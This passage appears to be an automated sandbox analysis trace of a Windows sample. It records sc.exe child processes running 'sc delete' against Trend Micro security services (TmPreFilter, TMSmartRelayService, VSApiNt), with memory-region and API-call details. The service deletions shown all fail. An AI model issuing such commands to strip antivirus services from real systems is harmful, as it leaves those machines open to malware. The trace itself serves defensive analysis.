[0079.400] CloseServiceHandle (hSCObject=0xfa306f8c80) returned 1 [0079.400] LocalFree (hMem=0x0) returned 0x0 [0079.400] exit (_Code=1060) Thread: id = 347 os_tid = 0x1338 Process: id = "70" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xf11c000" os_pid = "0xe04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"TmPreFilter\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1413 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1414 start_va = 0x4f27570000 end_va = 0x4f2758ffff entry_point = 0x0 region_type = private name = "private_0x0000004f27570000" filename = "" Region: id = 1415 start_va = 0x4f27590000 end_va = 0x4f275a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004f27590000" filename = "" Region: id = 1416 start_va = 0x4f275b0000 end_va = 0x4f2762ffff entry_point = 0x0 region_type = private name = "private_0x0000004f275b0000" filename = "" Region: id = 1417 start_va = 0x4f27630000 end_va = 0x4f27633fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004f27630000" filename = "" Region: id = 1418 start_va = 0x4f27640000 end_va = 0x4f27640fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004f27640000" filename = "" Region: id = 1419 start_va = 0x4f27650000 end_va = 0x4f27651fff entry_point = 0x0 region_type = private name = "private_0x0000004f27650000" filename = "" Region: id = 1420 start_va = 0x7df5ffe10000 end_va = 0x7ff5ffe0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffe10000" filename = "" Region: id = 1421 start_va = 0x7ff67acc0000 end_va = 0x7ff67ace2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67acc0000" filename = "" Region: id = 1422 start_va = 0x7ff67aced000 end_va = 0x7ff67aceefff entry_point = 0x0 region_type = private name = "private_0x00007ff67aced000" filename = "" Region: id = 1423 start_va = 0x7ff67acef000 end_va = 0x7ff67aceffff entry_point = 0x0 region_type = private name = "private_0x00007ff67acef000" filename = "" Region: id = 1424 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1425 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1735 start_va = 0x4f27810000 end_va = 0x4f2790ffff entry_point = 0x0 region_type = private name = "private_0x0000004f27810000" filename = "" Region: id = 1736 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1737 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5437 start_va = 0x4f27570000 end_va = 0x4f2757ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004f27570000" filename = "" Region: id = 5438 start_va = 0x4f27580000 end_va = 0x4f27586fff entry_point = 0x0 region_type = private name = "private_0x0000004f27580000" filename = "" Region: id = 5439 start_va = 0x4f27660000 end_va = 0x4f2771dfff entry_point = 0x4f27660000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5440 start_va = 0x4f27720000 end_va = 0x4f2779ffff entry_point = 0x0 region_type = private name = "private_0x0000004f27720000" filename = "" Region: id = 5441 start_va = 0x4f279c0000 end_va = 0x4f279cffff entry_point = 0x0 region_type = private name = "private_0x0000004f279c0000" filename = "" Region: id = 5442 start_va = 0x7ff67abc0000 end_va = 0x7ff67acbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67abc0000" filename = "" Region: id = 5443 start_va = 0x7ff67aceb000 end_va = 0x7ff67acecfff entry_point = 0x0 region_type = private name = "private_0x00007ff67aceb000" filename = "" Region: id = 5444 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5445 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5446 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5447 start_va = 0x4f277a0000 end_va = 0x4f277a6fff entry_point = 0x0 region_type = private name = "private_0x0000004f277a0000" filename = "" Region: id = 5448 start_va = 0x4f279d0000 end_va = 0x4f27aaefff entry_point = 0x4f279d0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5449 start_va = 0x4f277b0000 end_va = 0x4f277c1fff entry_point = 0x4f277b0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 98 os_tid = 0xe08 [0078.985] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0078.985] __set_app_type (_Type=0x1) [0078.985] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0078.985] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0078.985] SetThreadUILanguage (LangId=0x0) returned 0x409 [0079.041] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0079.041] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0079.041] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0079.041] _wcsicmp (_String1="delete", _String2="query") returned -13 [0079.041] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0079.041] _wcsicmp (_String1="delete", _String2="start") returned -15 [0079.041] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0079.041] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0079.041] _wcsicmp (_String1="delete", _String2="control") returned 1 [0079.041] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0079.041] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0079.041] _wcsicmp (_String1="delete", _String2="config") returned 1 [0079.041] _wcsicmp (_String1="delete", _String2="description") returned -7 [0079.041] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0079.041] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0079.041] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0079.041] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0079.041] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0079.041] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0079.041] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0079.041] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0079.041] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0079.042] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0079.042] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0079.042] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0079.042] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0079.042] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0079.042] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0079.042] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0079.042] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0079.042] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0079.042] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0079.042] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0079.042] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0079.042] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0079.046] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x4f27818cb0 [0079.051] OpenServiceW (hSCManager=0x4f27818cb0, lpServiceName="TmPreFilter", dwDesiredAccess=0x10000) returned 0x0 [0079.051] GetLastError () returned 0x424 [0079.051] _ultow (in: _Dest=0x424, _Radix=660797288 | out: _Dest=0x424) returned="1060" [0079.051] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0079.053] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x4f2762f720, nSize=0x2, Arguments=0x4f2762f750 | out: lpBuffer="鎰➁O") returned 0x62 [0079.053] GetFileType (hFile=0x24) returned 0x2 [0079.053] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x4f2762f6d0 | out: lpMode=0x4f2762f6d0) returned 1 [0079.289] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x4f278193b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x4f2762f6c8, lpReserved=0x0 | out: lpBuffer=0x4f278193b0*, lpNumberOfCharsWritten=0x4f2762f6c8*=0x62) returned 1 [0079.290] LocalFree (hMem=0x4f278193b0) returned 0x0 [0079.290] LocalFree (hMem=0x0) returned 0x0 [0079.290] CloseServiceHandle (hSCObject=0x4f27818cb0) returned 1 [0079.290] LocalFree (hMem=0x0) returned 0x0 [0079.290] exit (_Code=1060) Thread: id = 346 os_tid = 0x1330 Process: id = "71" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x78961000" os_pid = "0xe0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"TMSmartRelayService\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1426 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1427 start_va = 0xc72c400000 end_va = 0xc72c41ffff entry_point = 0x0 region_type = private name = "private_0x000000c72c400000" filename = "" Region: id = 1428 start_va = 0xc72c420000 end_va = 0xc72c433fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c72c420000" filename = "" Region: id = 1429 start_va = 0xc72c440000 end_va = 0xc72c4bffff entry_point = 0x0 region_type = private name = "private_0x000000c72c440000" filename = "" Region: id = 1430 start_va = 0xc72c4c0000 end_va = 0xc72c4c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c72c4c0000" filename = "" Region: id = 1431 start_va = 0xc72c4d0000 end_va = 0xc72c4d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c72c4d0000" filename = "" Region: id = 1432 start_va = 0xc72c4e0000 end_va = 0xc72c4e1fff entry_point = 0x0 region_type = private name = "private_0x000000c72c4e0000" filename = "" Region: id = 1433 start_va = 0x7df5ff5f0000 end_va = 0x7ff5ff5effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff5f0000" filename = "" Region: id = 1434 start_va = 0x7ff67adb0000 end_va = 0x7ff67add2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67adb0000" filename = "" Region: id = 1435 start_va = 0x7ff67addd000 end_va = 0x7ff67addefff entry_point = 0x0 region_type = private name = "private_0x00007ff67addd000" filename = "" Region: id = 1436 start_va = 0x7ff67addf000 end_va = 0x7ff67addffff entry_point = 0x0 region_type = private name = "private_0x00007ff67addf000" filename = "" Region: id = 1437 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1438 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1738 start_va = 0xc72c620000 end_va = 0xc72c71ffff entry_point = 0x0 region_type = private name = "private_0x000000c72c620000" filename = "" Region: id = 1739 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1740 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5390 start_va = 0xc72c400000 end_va = 0xc72c40ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c72c400000" filename = "" Region: id = 5391 start_va = 0xc72c410000 end_va = 0xc72c416fff entry_point = 0x0 region_type = private name = "private_0x000000c72c410000" filename = "" Region: id = 5392 start_va = 0xc72c4f0000 end_va = 0xc72c5adfff entry_point = 0xc72c4f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5393 start_va = 0xc72c720000 end_va = 0xc72c79ffff entry_point = 0x0 region_type = private name = "private_0x000000c72c720000" filename = "" Region: id = 5394 start_va = 0xc72c880000 end_va = 0xc72c88ffff entry_point = 0x0 region_type = private name = "private_0x000000c72c880000" filename = "" Region: id = 5395 start_va = 0x7ff67acb0000 end_va = 0x7ff67adaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67acb0000" filename = "" Region: id = 5396 start_va = 0x7ff67addb000 end_va = 0x7ff67addcfff entry_point = 0x0 region_type = private name = "private_0x00007ff67addb000" filename = "" Region: id = 5397 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5398 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5403 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5404 start_va = 0xc72c5b0000 end_va = 0xc72c5b6fff entry_point = 0x0 region_type = private name = "private_0x000000c72c5b0000" filename = "" Region: id = 5435 start_va = 0xc72c7a0000 end_va = 0xc72c87efff entry_point = 0xc72c7a0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5436 start_va = 0xc72c5c0000 end_va = 0xc72c5d1fff entry_point = 0xc72c5c0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 99 os_tid = 0xe10 [0078.782] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0078.782] __set_app_type (_Type=0x1) [0078.782] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0078.782] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0078.782] SetThreadUILanguage (LangId=0x0) returned 0x409 [0078.850] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0078.850] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0078.850] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0078.850] _wcsicmp (_String1="delete", _String2="query") returned -13 [0078.850] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0078.850] _wcsicmp (_String1="delete", _String2="start") returned -15 [0078.850] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0078.850] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0078.850] _wcsicmp (_String1="delete", _String2="control") returned 1 [0078.850] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0078.850] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0078.850] _wcsicmp (_String1="delete", _String2="config") returned 1 [0078.850] _wcsicmp (_String1="delete", _String2="description") returned -7 [0078.850] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0078.850] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0078.850] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0078.850] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0078.850] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0078.850] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0078.850] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0078.850] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0078.850] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0078.850] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0078.850] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0078.850] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0078.850] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0078.850] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0078.850] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0078.850] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0078.850] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0078.851] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0078.851] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0078.851] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0078.851] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0078.851] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0078.852] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xc72c628a60 [0078.954] OpenServiceW (hSCManager=0xc72c628a60, lpServiceName="TMSmartRelayService", dwDesiredAccess=0x10000) returned 0x0 [0078.954] GetLastError () returned 0x424 [0078.955] _ultow (in: _Dest=0x424, _Radix=743177336 | out: _Dest=0x424) returned="1060" [0078.955] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0078.956] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xc72c4bfc30, nSize=0x2, Arguments=0xc72c4bfc60 | out: lpBuffer="顐ⱢÇ") returned 0x62 [0078.956] GetFileType (hFile=0x24) returned 0x2 [0078.956] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xc72c4bfbe0 | out: lpMode=0xc72c4bfbe0) returned 1 [0079.000] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xc72c629850*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xc72c4bfbd8, lpReserved=0x0 | out: lpBuffer=0xc72c629850*, lpNumberOfCharsWritten=0xc72c4bfbd8*=0x62) returned 1 [0079.000] LocalFree (hMem=0xc72c629850) returned 0x0 [0079.001] LocalFree (hMem=0x0) returned 0x0 [0079.001] CloseServiceHandle (hSCObject=0xc72c628a60) returned 1 [0079.001] LocalFree (hMem=0x0) returned 0x0 [0079.001] exit (_Code=1060) Thread: id = 345 os_tid = 0x131c Process: id = "72" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xf126000" os_pid = "0xe14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"VSApiNt\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1439 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1440 start_va = 0x50ec780000 end_va = 0x50ec79ffff entry_point = 0x0 region_type = private name = "private_0x00000050ec780000" filename = "" Region: id = 1441 start_va = 0x50ec7a0000 end_va = 0x50ec7b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000050ec7a0000" filename = "" Region: id = 1442 start_va = 0x50ec7c0000 end_va = 0x50ec83ffff entry_point = 0x0 region_type = private name = "private_0x00000050ec7c0000" filename = "" Region: id = 1443 start_va = 0x50ec840000 end_va = 0x50ec843fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000050ec840000" filename = "" Region: id = 1444 start_va = 0x50ec850000 end_va = 0x50ec850fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000050ec850000" filename = "" Region: id = 1445 start_va = 0x50ec860000 end_va = 0x50ec861fff entry_point = 0x0 region_type = private name = "private_0x00000050ec860000" filename = "" Region: id = 1446 start_va = 0x7df5ff020000 end_va = 0x7ff5ff01ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff020000" filename = "" Region: id = 1447 start_va = 0x7ff67adb0000 end_va = 0x7ff67add2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67adb0000" filename = "" Region: id = 1448 start_va = 0x7ff67addb000 end_va = 0x7ff67addbfff entry_point = 0x0 region_type = private name = "private_0x00007ff67addb000" filename = "" Region: id = 1449 start_va = 0x7ff67adde000 end_va = 0x7ff67addffff entry_point = 0x0 region_type = private name = "private_0x00007ff67adde000" filename = "" Region: id = 1450 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1451 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1741 start_va = 0x50ec970000 end_va = 0x50eca6ffff entry_point = 0x0 region_type = private name = "private_0x00000050ec970000" filename = "" Region: id = 1742 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1743 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5381 start_va = 0x50ec780000 end_va = 0x50ec78ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000050ec780000" filename = "" Region: id = 5382 start_va = 0x50ec790000 end_va = 0x50ec796fff entry_point = 0x0 region_type = private name = "private_0x00000050ec790000" filename = "" Region: id = 5383 start_va = 0x50ec870000 end_va = 0x50ec92dfff entry_point = 0x50ec870000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5384 start_va = 0x50eca70000 end_va = 0x50ecaeffff entry_point = 0x0 region_type = private name = "private_0x00000050eca70000" filename = "" Region: id = 5385 start_va = 0x50eccc0000 end_va = 0x50ecccffff entry_point = 0x0 region_type = private name = "private_0x00000050eccc0000" filename = "" Region: id = 5386 start_va = 0x7ff67acb0000 end_va = 0x7ff67adaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67acb0000" filename = "" Region: id = 5387 start_va = 0x7ff67addc000 end_va = 0x7ff67adddfff entry_point = 0x0 region_type = private name = "private_0x00007ff67addc000" filename = "" Region: id = 5388 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5389 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5399 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5400 start_va = 0x50ec930000 end_va = 0x50ec936fff entry_point = 0x0 region_type = private name = "private_0x00000050ec930000" filename = "" Region: id = 5401 start_va = 0x50ecaf0000 end_va = 0x50ecbcefff entry_point = 0x50ecaf0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5402 start_va = 0x50ec940000 end_va = 0x50ec951fff entry_point = 0x50ec940000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 100 os_tid = 0xe18 [0078.767] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0078.767] __set_app_type (_Type=0x1) [0078.768] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0078.768] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0078.768] SetThreadUILanguage (LangId=0x0) returned 0x409 [0078.818] 